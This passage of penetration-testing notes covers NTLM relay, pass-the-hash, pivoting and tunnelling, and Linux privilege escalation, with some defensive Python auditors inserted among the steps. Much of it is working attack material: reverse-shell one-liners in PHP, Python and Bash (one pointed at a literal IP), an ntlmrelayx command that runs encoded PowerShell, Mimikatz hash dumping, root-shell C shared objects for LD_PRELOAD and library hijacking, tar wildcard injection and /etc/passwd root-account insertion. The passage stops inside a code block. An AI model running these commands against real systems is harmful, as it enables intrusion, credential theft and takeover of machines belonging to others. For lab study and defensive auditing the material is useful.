- Instead of printing a retrieved Net-NTLMv2 hash, we'll forward it to `<IP>`, which is the target machine: `sudo impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c "powershell -enc <BASE64>"`
  - use it to execute a reverse shell on your machine on port `<PORT>` and run a listener with `nc -nvlp <PORT>`
  - see how to encode a one-liner in base64 here
- Now, if a user tries to connect to our machine with `dir \\<ATTACKER-IP>\test`, it will forward the request to `<IP>` and execute the command specified in the flag `-c`
Note: this attack works for the Administrator user (except for certain conditions). Since Windows Vista, all Windows versions have UAC remote restrictions enabled by default.
- From Mimikatz, run `privilege::debug`, `token::elevate` and `lsadump::sam` to obtain the NTLM hash of Administrator
- Gain access to a SMB share with `smbclient \\\\<IP>\\<SMB-SHARE> -U Administrator --pw-nt-hash <Administrator-HASH>`
- Gain an interactive shell with `impacket-psexec -hashes <LMHash>:<NTHash> <username>@<ip> <command>`
  - This will always give a shell as `SYSTEM`, use `impacket-wmiexec` to obtain a shell as the user used for authentication
  - `<command>` is optional. If left blank, cmd.exe will be executed
  - See also: impacket-scripts
Other notes:
- "Pass the Hash Attack"
- "PsExec Explainer by Mark Russinovich"
- pth-winexe: `pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe`
  - `-U` specifying the username and hash, along with the SMB share and the name of the command to execute
Tools
- Edit `/etc/rinetd.conf`, add `0.0.0.0 <Local-PORT> <IP> <DEST-PORT>`
  - This means that all traffic received on port `<Local-PORT>` of our machine, listening on all interfaces (`0.0.0.0`), regardless of destination address, will be forwarded to `<IP>:<DEST-PORT>`.
- Restart rinetd with `sudo service rinetd restart` and confirm that the port is bound with `ss -antp | grep "80"`
- `socat -ddd TCP-LISTEN:<PORT>,fork TCP:<DEST-IP>:<DEST-PORT>`
  - The traffic received on port `<PORT>` will be forwarded to `<DEST-IP>:<DEST-PORT>`
- Example with SSH: `socat TCP-LISTEN:2222,fork TCP:<IP>:22`
- Example with `psql -h 192.168.50.63 -p 2345 -U postgres`: `socat -ddd TCP-LISTEN:2345,fork TCP:<IP>:5432`
See: "SSH Tunneling: Examples, Command, Server Config"
- Give a reverse shell TTY functionality with Python3's pty: `python3 -c 'import pty; pty.spawn("/bin/bash")'`
- `ssh -R <local-port>:127.0.0.1:<target-port> <username>@<local-machine>`
- `ssh -N -L <bind_address>:<port>:<host>:<hostport> <username>@<address>`
  - Listen on all interfaces (`<bind_address>` = `0.0.0.0`) on port `<port>`, then forward all packets through the SSH tunnel (`<username>@<address>`) to port `<hostport>` on the host `<host>`
  - Verify it with `ss -ntplu`
- From the reverse shell, run `ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>`
- Now we must direct our tools to use this proxy with ProxyChains
  - Edit the ProxyChains configuration file `/etc/proxychains.conf`, add the SOCKS5 proxy `socks5 <IP-reverse-shell> <port to bind to>`
- To run the tools through the SOCKS5 proxy, prepend each command with ProxyChains
  - Example with nmap: `sudo proxychains nmap -vvv -sT --top-ports=20 -Pn <IP>`
  - Example with SMB: `proxychains smbclient -L //<IP>/ -U <username> --password=<password>`
- Start ssh on your local machine
- On the reverse shell: ssh -N -R [bind_address]:port:host:hostport [username@address]
- Set [bind_address] as 127.0.0.1 and [username@address] to the user and address of your local ssh server
- On the reverse shell, run python3 -c 'import pty; pty.spawn("/bin/bash")' and then ssh -N -R <PORT> [username@address], where [username@address] is your local ssh server
- Edit the ProxyChains configuration file /etc/proxychains.conf and add the SOCKS5 proxy: socks5 127.0.0.1 <PORT>
- To run the tools through the SOCKS5 proxy, prepend each command with proxychains
- Note: it requires root privileges on the SSH client and Python3 on the SSH server
- From the reverse shell, run socat TCP-LISTEN:2222,fork TCP:<forward-IP>:<forward-PORT>
sshuttle -r <ssh-connection-string> <subnet> ...
- Specify the SSH connection string we want to use (<ssh-connection-string>) and the subnets that we want to tunnel through this connection (ex. 10.74.23.0/24 172.16.163.0/24)
- Start the SSH server on Kali: sudo systemctl start ssh
- Connect the Windows machine to Kali. Note: the OpenSSH bundled with Windows has to be higher than 7.6 for remote dynamic port forwarding: ssh -N -R <PORT> <kali>@<IP>
- Edit the ProxyChains configuration file /etc/proxychains.conf and add the SOCKS5 proxy to it (socks5 127.0.0.1 <PORT>)
- To run the tools through the SOCKS5 proxy, prepend each command with proxychains
The general format is: plink.exe <user>@<kali-IP> -R <kaliport>:<target-IP>:<target-port>
The first time plink connects to a host, it will attempt to cache the host key in the registry. For this reason, we should pipe the answer to the prompt with the cmd.exe /c echo y command. The final result will look like cmd.exe /c echo y | plink.exe <user>@<kali> -R <kaliport>:<target-IP>:<target-port>
netsh interface portproxy add v4tov4 listenport=<PORT> listenaddress=<IP> connectport=<forward-PORT> connectaddress=<forward-IP>
- Use the netsh interface context to add an IPv4-to-IPv4 (v4tov4) proxy (portproxy)
- listening on <target-IP> (listenaddress=<target-IP>), port <target-port> (listenport=<target-port>)
- that will forward to <forward-IP> (connectaddress=<forward-IP>), port <forward-port> (connectport=<forward-port>)
- Allow the listening port through the Windows firewall: netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<IP> localport=<port> action=allow
- The machines are KALI01, DMZ01 and INTERNAL01. KALI01 will listen on TCP port 1080, a SOCKS proxy port
- In KALI01, copy the Chisel binary to the Apache2 server folder with sudo cp $(which chisel) /var/www/html/ and start Apache2 with sudo systemctl start apache2
- Deliver the Chisel executable to the DMZ
- On KALI01, run Chisel with chisel server --port 8080 --reverse and run sudo tcpdump -nvvvXi <INTERFACE> tcp port 8080 (ip a retrieves the list of all interfaces)
- On DMZ01, run the Chisel client command /tmp/chisel client <KALI01-IP>:8080 R:socks > /dev/null 2>&1 &
- Now, you should be able to see inbound Chisel traffic and an incoming connection in the Chisel server
- Check if the SOCKS port has been opened by the KALI01 Chisel server with ss -ntplu
- How to use the HTTP Tunnel
- SSH with Ncat: pass an Ncat command to ProxyCommand to use the socks5 protocol and the proxy socket at 127.0.0.1:1080 to connect to INTERNAL01: ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' <username>@<IP>, where the %h and %p tokens represent the SSH command host and port values
- Another option is to use ProxyChains by adding socks5 127.0.0.1 1080 to /etc/proxychains.conf and prepending sudo proxychains to each command we want to run
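The rinetd, socat and Chisel steps above all end with the same check, ss -antp or ss -ntplu, to confirm that a forwarder bound its port. The script below is an added example (not from EasyG or any of the tools named here) that automates that check from the host-defender side: it parses ss output and lists listeners bound to every interface and listeners owned by known forwarding tools, which is how a blue team spots a pivot left on a box. The watch-list PIVOT_TOOLS and the SAMPLE_SS output are constructed for the example.

```python
import re

# Tools commonly used to stand up a pivot or forwarder (rinetd, socat,
# chisel ... as in the notes above). Constructed watch-list for this example.
PIVOT_TOOLS = {"socat", "rinetd", "chisel", "sshuttle", "plink", "ncat"}

# Constructed sample of `ss -ntplu` output; not captured from a real host.
SAMPLE_SS = """\
Netid  State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
tcp    LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
tcp    LISTEN  0       5       0.0.0.0:2222         0.0.0.0:*          users:(("socat",pid=4412,fd=5))
tcp    LISTEN  0       128     127.0.0.1:1080       0.0.0.0:*          users:(("chisel",pid=4501,fd=8))
tcp    LISTEN  0       128     [::]:80              [::]:*             users:(("rinetd",pid=990,fd=4))
udp    UNCONN  0       0       0.0.0.0:68           0.0.0.0:*          users:(("dhclient",pid=640,fd=6))
tcp    ESTAB   0       0       10.0.0.5:2222        10.0.0.9:51234     users:(("socat",pid=4419,fd=5))
"""

PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')
WILDCARD = {"0.0.0.0", "*", "[::]", "::"}


def parse_ss(text):
    """Turn `ss -ntplu` / `ss -antp` output into a list of socket dicts."""
    entries = []
    for line in text.splitlines()[1:]:          # skip the header row
        tokens = line.split()
        off = 1 if tokens and tokens[0] in ("tcp", "udp") else 0   # Netid column present?
        if len(tokens) < off + 5:
            continue
        addr, _, port = tokens[off + 3].rpartition(":")
        proc = PROC_RE.search(line)             # absent when ss runs unprivileged
        entries.append({
            "proto": tokens[0] if off else "tcp",
            "state": tokens[off],
            "addr": addr,
            "port": int(port) if port.isdigit() else port,
            "proc": proc.group(1) if proc else None,
            "pid": int(proc.group(2)) if proc else None,
        })
    return entries


def wildcard_listeners(text):
    """Listening sockets bound to every interface (0.0.0.0 / [::])."""
    return [e for e in parse_ss(text)
            if e["state"] == "LISTEN" and e["addr"] in WILDCARD]


def suspected_forwarders(text, tools=PIVOT_TOOLS):
    """Listening sockets owned by a known forwarding/pivot tool, any bind address."""
    return [e for e in parse_ss(text)
            if e["state"] == "LISTEN" and e["proc"] in tools]


if __name__ == "__main__":
    for e in suspected_forwarders(SAMPLE_SS):
        print(f"{e['proc']} (pid {e['pid']}) listens on {e['addr']}:{e['port']}")
```

On a live host feed it the real output, for example subprocess.run(["ss", "-ntplu"], capture_output=True, text=True).stdout; the process column only appears when ss runs as root, so run the audit with privileges or the proc field stays None.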
- Setup: WAN, DMZ and INTERNAL
- From a machine inside WAN, set up a DNS server by using software like Dnsmasq: sudo dnsmasq -C dnsmasq.conf -d. An example of configuration (see also dnsmasq.conf.example):
# Do not read /etc/resolv.conf or /etc/hosts
no-resolv
no-hosts
# Define the zone
auth-zone=organization.corp
auth-server=organization.corp
# TXT record
txt-record=www.organization.corp,some info.
txt-record=www.organization.corp,some other info.
- Watch the queries arriving with sudo tcpdump -i ens192 udp port 53
- Setup: WAN, DMZ and INTERNAL
- Start dnscat2-server organization.corp from WAN and connect from INTERNAL to it with ./dnscat feline.corp
- From dnscat2-server:
>window -i 1
>listen 127.0.0.1:<listener-PORT> <IP>:<PORT>
where <IP>:<PORT> = machine from INTERNAL
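The tcpdump capture above is also the detection surface for DNS tunnelling: a dnscat2 session carries its payload in the query names, so the subdomains under the tunnelled zone look like encoded data rather than hostnames. The script below is an added example (not part of EasyG, dnsmasq or dnscat2) that parses tcpdump's DNS query lines and flags zones receiving many distinct, long, hex-looking subdomain queries. The SAMPLE_TCPDUMP lines and the thresholds (min_unique, min_sub_len, min_hex_ratio) are constructed for the example.

```python
import re
from collections import defaultdict

# Query lines as printed by `tcpdump -i <iface> udp port 53`. The sample below
# is constructed for this example: four dnscat2-style queries (hex labels under
# organization.corp) mixed with ordinary lookups and one response line.
SAMPLE_TCPDUMP = """\
12:00:01.000001 IP 10.10.30.7.40001 > 10.10.10.5.53: 41268+ TXT? c1a0.4f7e2b9d0a3c5e1f8b6d2a4c7e9f0b1d.organization.corp. (76)
12:00:01.100002 IP 10.10.30.7.40001 > 10.10.10.5.53: 41269+ TXT? c1a1.9d0a3c5e1f8b6d2a4c7e9f0b1d4f7e2b.organization.corp. (76)
12:00:01.200003 IP 10.10.30.7.40001 > 10.10.10.5.53: 41270+ CNAME? c1a2.0b1d4f7e2b9d0a3c5e1f8b6d2a4c7e9f.organization.corp. (76)
12:00:01.300004 IP 10.10.30.7.40001 > 10.10.10.5.53: 41271+ MX? c1a3.5e1f8b6d2a4c7e9f0b1d4f7e2b9d0a3c.organization.corp. (76)
12:00:02.000005 IP 10.10.30.8.51000 > 10.10.10.5.53: 1001+ A? www.organization.corp. (39)
12:00:02.500006 IP 10.10.30.8.51000 > 10.10.10.5.53: 1002+ A? mail.example.com. (34)
12:00:03.000007 IP 10.10.10.5.53 > 10.10.30.8.51000: 1002 1/0/0 A 93.184.216.34 (50)
"""

# "> <resolver>.53: <id>+ <TYPE>? <name>. (<len>)" -- responses do not match
QUERY_RE = re.compile(r"> \S+\.53: \d+\+? ([A-Z]+)\? (\S+)\. \(\d+\)")
HEX = set("0123456789abcdef")


def parse_query(line):
    """Return (qtype, zone, subdomain) for a query line, else None."""
    m = QUERY_RE.search(line)
    if not m:
        return None
    labels = m.group(2).lower().split(".")
    return m.group(1), ".".join(labels[-2:]), ".".join(labels[:-2])


def suspicious_zones(lines, min_unique=4, min_sub_len=24, min_hex_ratio=0.8):
    """Zones that receive many distinct, long, hex-looking subdomain queries.

    Thresholds are constructed defaults for this example; tune them per network
    (CDNs and anti-spam services also produce long machine-generated labels).
    """
    subs_by_zone = defaultdict(set)
    for line in lines:
        parsed = parse_query(line)
        if parsed:
            _, zone, sub = parsed
            subs_by_zone[zone].add(sub)
    flagged = []
    for zone, subs in sorted(subs_by_zone.items()):
        if len(subs) < min_unique:
            continue
        chars = "".join(s.replace(".", "") for s in subs)
        avg_len = sum(len(s) for s in subs) / len(subs)
        hex_ratio = sum(c in HEX for c in chars) / len(chars) if chars else 0.0
        if avg_len >= min_sub_len and hex_ratio >= min_hex_ratio:
            flagged.append((zone, {"unique_subdomains": len(subs),
                                   "avg_sub_len": round(avg_len, 1),
                                   "hex_ratio": round(hex_ratio, 2)}))
    return flagged


if __name__ == "__main__":
    for zone, metrics in suspicious_zones(SAMPLE_TCPDUMP.splitlines()):
        print(zone, metrics)
```

Pipe a live capture in with tcpdump -l -i ens192 udp port 53 | python3 dnstunnel.py (reading sys.stdin instead of the sample); the zone is taken as the last two labels, so a resolver log for a three-label public suffix such as co.uk would need a suffix list to split correctly.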
- TryHackMe | Linux PrivEsc
- Linux Privilege Escalation for OSCP & Beyond! | Udemy
- "Understanding and Using File Permissions | Ubuntu"
- "File permissions and attributes | Arch Linux"
- Basic Linux Privilege Escalation
- Tools
- Linux Exploit Suggester 2
- LinPEAS - Linux Privilege Escalation Awesome Script
- Unix-privesc-check
./unix-privesc-check standard > output.txt
- linux-smart-enumeration
- LinEnum
- Reverse Shell Generator - rsg
- Check your user with id and whoami
- Run linux-smart-enumeration with increasing levels, starting from lvl 0 up to 2: ./lse.sh -l 0
- Run other scripts
- If the scripts fail, run the commands in this section and see Basic Linux Privilege Escalation
PHP
php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
Python
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Bash
#!/bin/bash
/usr/bin/bash -i >& /dev/tcp/192.168.45.226/445 0>&1
More shells
- Reverse Shell Cheat Sheet
- Reverse Shell Generator
- Upgrade a Dumb Shell to a Fully Interactive Shell for More Flexibility
python -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null
ps aux | grep "^root"
Show all processes running as root
- Identify the program version with <program> --version or <program> -v
- On Debian-like systems, run dpkg -l | grep <program>
- On systems that use rpm, run rpm -qa | grep <program>
MySQL service running as root with no password assigned
- Run mysqld --version
- One great exploit is the following: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.
- Once the UDF is installed, run the following command in the MySQL shell: mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');
- Run /tmp/rootbash for a root shell: /tmp/rootbash -p
Readable /etc/shadow
- Check if /etc/shadow is readable with ls -l /etc/shadow
- Run cat /etc/shadow > hash.txt and then john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Writable /etc/shadow
- Check if /etc/shadow is writable with ls -l /etc/shadow
- Generate a new password hash with mkpasswd -m sha-512 newpass
- Substitute the root password hash with the new hash with nano /etc/shadow
Writable /etc/passwd
- Check if /etc/passwd is writable with ls -l /etc/passwd
- Generate a new password hash with openssl passwd newpass
- Substitute the root password hash with the new hash with nano /etc/passwd
- or add a new root user to /etc/passwd with echo 'root2:<password hash>:0:0:root:/root:/bin/bash' >> /etc/passwd
- test the new user with su root2 and id
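The three checks above (readable /etc/shadow, writable /etc/shadow, writable /etc/passwd) are each a one-line ls -l; the script below is an added example (not EasyG's own code) that turns them into an audit a defender can run or a CTF player can use to verify the state of a box: it classifies the mode bits of the sensitive files against an assumed baseline and parses /etc/passwd for exactly the artefacts the steps above create, a second UID-0 account and a hash stored in the password field. BASELINE holds assumed Debian/Ubuntu default modes and SAMPLE_PASSWD is constructed (the hash value is a placeholder).

```python
import os
import stat

# Assumed baseline modes (Debian/Ubuntu defaults) for the files checked in
# this section; adjust for your distribution.
BASELINE = {"/etc/passwd": 0o644, "/etc/shadow": 0o640, "/etc/sudoers": 0o440}

# Constructed /etc/passwd for the example: contains the 'root2' UID-0 account
# and a password hash stored directly in /etc/passwd, exactly what the
# "Writable /etc/passwd" steps above produce (hash value is a placeholder).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
root2:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
"""


def classify_mode(path, st_mode):
    """Findings for a sensitive file given its st_mode (pure, so it is testable)."""
    perm = stat.S_IMODE(st_mode)
    findings = []
    if perm & stat.S_IWOTH:
        findings.append("world-writable")
    if perm & stat.S_IWGRP:
        findings.append("group-writable")
    if path == "/etc/shadow" and perm & stat.S_IROTH:
        findings.append("world-readable (hashes can be copied and cracked offline)")
    expected = BASELINE.get(path)
    if expected is not None and perm & ~expected:
        findings.append(f"mode {oct(perm)} exceeds baseline {oct(expected)}")
    return findings


def audit_file(path):
    """Run classify_mode against the live filesystem."""
    try:
        return classify_mode(path, os.stat(path).st_mode)
    except FileNotFoundError:
        return ["missing"]


def _passwd_rows(text):
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7:            # name:pw:uid:gid:gecos:home:shell
            yield fields


def extra_uid0_accounts(passwd_text):
    """Accounts other than 'root' that have UID 0."""
    return [f[0] for f in _passwd_rows(passwd_text) if f[2] == "0" and f[0] != "root"]


def weak_passwd_entries(passwd_text):
    """Accounts whose password field is empty or holds a hash instead of 'x'."""
    out = []
    for f in _passwd_rows(passwd_text):
        if f[1] == "":
            out.append((f[0], "empty password field"))
        elif f[1] not in ("x", "*", "!", "!!"):
            out.append((f[0], "hash stored in /etc/passwd"))
    return out


if __name__ == "__main__":
    for p in BASELINE:
        print(p, audit_file(p) or "ok")
    print("extra uid 0:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("weak entries:", weak_passwd_entries(SAMPLE_PASSWD))
```

A hash in the second field of /etc/passwd is honoured by most PAM stacks in preference to /etc/shadow, which is why the openssl passwd trick above works and why the check for it belongs in any baseline audit.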
env
inspect environment variables
cat .bashrc
inspect .bashrc
watch -n 1 "ps -aux | grep pass"
harvest active processes for credentials
sudo tcpdump -i lo -A | grep "pass"
perform password sniffing
Classic method
- Try to run sudo su
- If su doesn't work, try with the following: sudo -s, sudo -i, sudo /bin/bash, sudo passwd
Shell Escape Sequences
sudo -l
list the programs which sudo allows your user to run
- See GTFOBins and search for the program names
apt-get privilege escalation
- apt get | GTFOBins
- Run sudo apt-get changelog apt and, inside the pager it opens, type !/bin/sh
Environment Variables
sudo -l
check which environment variables are inherited, look for the env_keep options
LD_PRELOAD loads a shared object before any others when a program is run
LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first
- First solution
- Create a shared object with gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c, using the code below
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
/* with -nostartfiles, _init runs as soon as the object is loaded */
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
- Run one of the programs you are allowed to run via sudo while setting the LD_PRELOAD environment variable to the full path of the new shared object: sudo LD_PRELOAD=/tmp/preload.so <program name>
- Second solution, with apache
- See which shared libraries are used by apache: ldd /usr/sbin/apache2
- Create a shared object with the same name as one of the listed libraries, gcc -o /tmp/libcrypt.so.1 -shared -fPIC /tmp/library_path.c, using the code below
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* constructor: runs when the dynamic linker loads the library */
static void hijack() __attribute__((constructor));
void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
- Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to /tmp, where the compiled shared object is
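Both solutions above depend on a single sudoers misconfiguration: env_keep passing LD_PRELOAD or LD_LIBRARY_PATH through to the sudo-run program (or env_reset being switched off entirely). The script below is an added example, not EasyG's code and not sudo's own parser, that reads a sudoers file, tracks env_reset and every env_keep +=, -= and = directive per Defaults scope, and reports the variables that let a sudo-run program load foreign code. SAMPLE_SUDOERS and the DANGEROUS_ENV list are constructed for the example; it does not follow #include directives.

```python
import re

# Variables through which a sudo-run program can be made to load foreign code.
# Constructed list for this example; extend it for interpreters you use.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT",
                 "PYTHONPATH", "PERL5OPT", "PERL5LIB"}

# Constructed /etc/sudoers for this example (with a hypothetical user alice).
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "HOME LANG"
Defaults        env_keep += "LD_PRELOAD LD_LIBRARY_PATH"   # the weak setting
Defaults:alice  env_keep += "PYTHONPATH"
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/sbin/apache2
"""

# "Defaults", optionally followed by a scope (:user, @host, >runas, !cmd)
DEFAULTS_RE = re.compile(r"^\s*Defaults(?P<scope>[:@>!]\S+)?\s+(?P<body>.*)$")
ENV_KEEP_RE = re.compile(r'env_keep\s*(\+=|-=|=)\s*"?([^"]*)"?')


def parse_sudoers(text):
    """Return (env_reset_enabled, {scope: set(kept variable names)})."""
    env_reset = True                      # sudo's compiled-in default
    kept = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = DEFAULTS_RE.match(line)
        if not m:
            continue
        scope = m.group("scope") or "ALL"
        for item in m.group("body").split(","):
            item = item.strip()
            if item == "env_reset":
                env_reset = True
            elif item == "!env_reset":
                env_reset = False
            em = ENV_KEEP_RE.match(item)
            if not em:
                continue
            op, names = em.group(1), set(em.group(2).split())
            current = kept.setdefault(scope, set())
            if op == "=":
                kept[scope] = names
            elif op == "+=":
                current |= names
            else:
                current -= names
    return env_reset, kept


def risky_env_keep(text):
    """(scope, variable) pairs that sudo would preserve and that load code."""
    env_reset, kept = parse_sudoers(text)
    findings = []
    if not env_reset:
        findings.append(("ALL", "!env_reset: the whole caller environment reaches sudo-run programs"))
    for scope, names in sorted(kept.items()):
        for name in sorted(names & DANGEROUS_ENV):
            findings.append((scope, name))
    return findings


if __name__ == "__main__":
    for scope, name in risky_env_keep(SAMPLE_SUDOERS):
        print(f"{scope}: {name}")
```

The fix is simply to drop those variables from env_keep (sudo already strips LD_* from the environment when env_reset is on and they are not kept); note that sudo -l on the target shows the effective result of these Defaults, which is what the notes above tell you to read.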
File Permissions
- View the contents of the system-wide crontab with cat /etc/crontab and the cron log file with grep "CRON" /var/log/syslog to see the cron jobs; locate the file each job runs with locate <program> and see its permissions with ls -l <program full path>
- If one of them is world-writable, substitute it with the following
#!/bin/bash
bash -i >& /dev/tcp/<Your-IP>/4444 0>&1
- You can also try with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your-IP> 4444 >/tmp/f
- Open a listener with nc -nvlp 4444
PATH Environment Variable
- See Task 9 - Linux PrivEsc | TryHackMe
- The crontab PATH environment variable is by default set to /usr/bin:/bin and can be overwritten in the crontab file
- It might be possible to create a program or script with the same name as the cron job if the program or script for a cron job does not utilize an absolute path and one of the PATH directories is editable by our user.
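The two cron weaknesses above (a world-writable job script, and a job that names its program without an absolute path while a writable directory sits on the crontab's PATH) can be audited from the crontab alone. The script below is an added example, not EasyG's own tooling, that parses an /etc/crontab-style file, tracks the PATH it sets, and reports relative program names, world-writable PATH directories and world-writable job targets. SAMPLE_CRONTAB and FAKE_FS (a path-to-mode stand-in for the filesystem) are constructed so the example runs offline; pass real_mode to audit a live host.

```python
import os
import shlex
import stat

DEFAULT_CRON_PATH = "/usr/bin:/bin"   # cron's PATH when the crontab sets none

# Constructed /etc/crontab for this example.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=""
# m h dom mon dow user  command
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
@reboot root /usr/local/bin/backup.sh
"""

# Constructed stand-in for the filesystem (path -> st_mode) so the example runs
# offline; pass real_mode instead to audit a live host.
FAKE_FS = {
    "/home/user": 0o40777,                    # world-writable directory on cron's PATH
    "/usr/local/sbin": 0o40755,
    "/usr/local/bin": 0o40755,
    "/sbin": 0o40755,
    "/bin": 0o40755,
    "/usr/sbin": 0o40755,
    "/usr/bin": 0o40755,
    "/usr/local/bin/compress.sh": 0o100755,
    "/usr/local/bin/backup.sh": 0o100777,     # world-writable script run as root
}


def fake_mode(path):
    return FAKE_FS[path]          # KeyError stands in for "no such file"


def real_mode(path):
    return os.stat(path).st_mode


def parse_system_crontab(text):
    """Yield (user, command, env) per job line, tracking VAR=value lines."""
    env = {"PATH": DEFAULT_CRON_PATH}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first and not line.startswith("@"):
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')
            continue
        # "@reboot user command" or "m h dom mon dow user command"
        fields = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(fields) < (3 if line.startswith("@") else 7):
            continue
        yield fields[-2], fields[-1], dict(env)


def _world_writable(path, mode_fn):
    try:
        return bool(stat.S_IMODE(mode_fn(path)) & stat.S_IWOTH)
    except (FileNotFoundError, PermissionError, KeyError):
        return False


def audit_crontab(text, mode_fn=real_mode):
    """Findings as (user, path_or_name, reason) for the cron weaknesses above."""
    findings = []
    for user, command, env in parse_system_crontab(text):
        try:
            prog = shlex.split(command)[0]
        except (ValueError, IndexError):
            continue
        if os.path.isabs(prog):
            candidates = [prog]
        else:
            findings.append((user, prog, "relative program name"))
            candidates = []
            for d in env["PATH"].split(":"):
                if _world_writable(d, mode_fn):
                    findings.append((user, d, "world-writable PATH directory"))
                candidates.append(os.path.join(d, prog))
        for path in candidates:
            if _world_writable(path, mode_fn):
                findings.append((user, path, "world-writable program"))
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB, fake_mode):
        print(finding)
```

The same parser applies to the per-user files under /var/spool/cron, except that those lines have no user column (use split(None, 5) and take the running user from the file name).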
Wildcards
- See Task 10 - Linux PrivEsc | TryHackMe
- Generate a reverse shell with msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o shell.elf and make it executable with chmod +x shell.elf
- Run other commands as part of tar's checkpoint feature, by creating files whose names are parsed as options when the cron job runs tar with a wildcard:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
setuid + GTFOBins
- Check for setuid binaries on the machine
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
- Use GTFOBins to elevate your privileges
Known Exploits
- Search for all the SUID/SGID executables on the Linux Machine
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
- Use Exploit-DB, Google and GitHub to find known exploits
Shared Object Injection
- See Task 12 - Linux PrivEsc | TryHackMe
strace <program to run> 2>&1 | grep -iE "open|access|no such file"
run strace and search the output for open/access calls and for "no such file" errors
- Compile a shared object with the name of the missing library, in the writable location where it is looked for, from the following code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* constructor: runs as soon as the dynamic linker loads the object */
static void inject() __attribute__((constructor));
void inject() {
    setuid(0);
    system("/bin/bash -p");
}
Environment Variables
Abusing Shell Features (#1)
- See Task 14 - Linux PrivEsc | TryHackMe
- "In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path."
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
Abusing Shell Features (#2)
- See Task 15 - Linux PrivEsc | TryHackMe. Note: this doesn't work on Bash versions 4.4 and above
- "When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements."
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' <program>
/tmp/rootbash -p
- View the content of history with cat ~/.*history | less and search for secrets
- Search for config files as they often contain passwords in plaintext or other reversible formats (example: *.ovpn)
- Search for backups and hidden files
ls -la /
look for hidden files & directories in the system root
- Other common locations to check
ls -la /home/user
ls -la /tmp
ls -la /var/backups
- See Task 18 - Linux PrivEsc | TryHackMe
- "Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user."
- Show the NFS server's export list: showmount -e <target>
- The same with nmap: nmap -sV --script=nfs-showmount <target>
- Mount an NFS share: mount -o rw,vers=2 <target>:<share> <local_directory>
- See Task 19 - Linux PrivEsc | TryHackMe
Root Squashing
- Root Squashing is how NFS prevents an obvious privilege escalation
- no_root_squash turns root squashing off
- Check: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
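On the server side the whole issue lives in one file, /etc/exports, so it is worth being able to audit it directly rather than only from showmount -e. The script below is an added example (not EasyG's code and not part of nfs-utils) that parses the exports file and reports every client clause that disables root squashing or exports to everyone. SAMPLE_EXPORTS is constructed for the example.

```python
import re

# Constructed /etc/exports for this example.
SAMPLE_EXPORTS = """\
# /etc/exports: constructed sample
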